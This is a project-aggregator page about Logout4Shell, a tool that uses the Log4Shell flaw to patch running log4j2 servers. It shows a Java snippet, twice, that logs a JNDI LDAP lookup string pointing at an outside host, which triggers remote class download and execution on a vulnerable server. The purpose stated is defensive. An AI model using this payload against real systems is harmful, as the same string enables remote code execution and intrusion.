Use this to automatically patch running log4j2 vulnerability... no need to restart the server

This page summarizes the projects mentioned and recommended in the original post on dev.to

InfluxDB - Power Real-Time Data Analytics at Scale
Get real-time insights from all types of time series data with InfluxDB. Ingest, query, and analyze billions of data points in real-time with unbounded cardinality.
www.influxdata.com
featured
SaaSHub - Software Alternatives and Reviews
SaaSHub helps you find the best software and product alternatives
www.saashub.com
featured
  • Logout4Shell

    Use Log4Shell vulnerability to vaccinate a victim server against Log4Shell (by freakynit)

  • public class log4j { private static final Logger logger = LogManager.getLogger(log4j.class); public static void main(String[] args) { // This will hit hhe server and download the class that will patch live log4j logger.error("${jndi:ldap://patchlog4j2live.xyz:1389/a}"); // The RCE should not work now... if you still see message printed // such as: "FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS", // that means the patch didn't work. // Raise issue here: https://github.com/freakynit/Logout4Shell // or here (original version): https://github.com/Cybereason/Logout4Shell logger.error("${jndi:ldap://patchlog4j2live.xyz:1389/a}"); } }

  • Logout4Shell

    Use Log4Shell vulnerability to vaccinate a victim server against Log4Shell

  • public class log4j { private static final Logger logger = LogManager.getLogger(log4j.class); public static void main(String[] args) { // This will hit hhe server and download the class that will patch live log4j logger.error("${jndi:ldap://patchlog4j2live.xyz:1389/a}"); // The RCE should not work now... if you still see message printed // such as: "FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS", // that means the patch didn't work. // Raise issue here: https://github.com/freakynit/Logout4Shell // or here (original version): https://github.com/Cybereason/Logout4Shell logger.error("${jndi:ldap://patchlog4j2live.xyz:1389/a}"); } }

  • InfluxDB

    Power Real-Time Data Analytics at Scale. Get real-time insights from all types of time series data with InfluxDB. Ingest, query, and analyze billions of data points in real-time with unbounded cardinality.

    InfluxDB logo
NOTE: The number of mentions on this list indicates mentions on common posts plus user suggested alternatives. Hence, a higher number means a more popular project.

Suggest a related project

Related posts

  • Modernizing the AntennaPod Code Structure

    3 projects | news.ycombinator.com | 20 May 2024
  • Spring Security Using Facebook Authorization: A Comprehensive Guide

    2 projects | dev.to | 22 May 2024
  • Building a BMI Calculator with Angular and Spring Boot

    3 projects | dev.to | 22 May 2024
  • Scaffold a Java spring boot application

    1 project | dev.to | 22 May 2024
  • Show HN: Rational numbers for Java, why not?

    1 project | news.ycombinator.com | 21 May 2024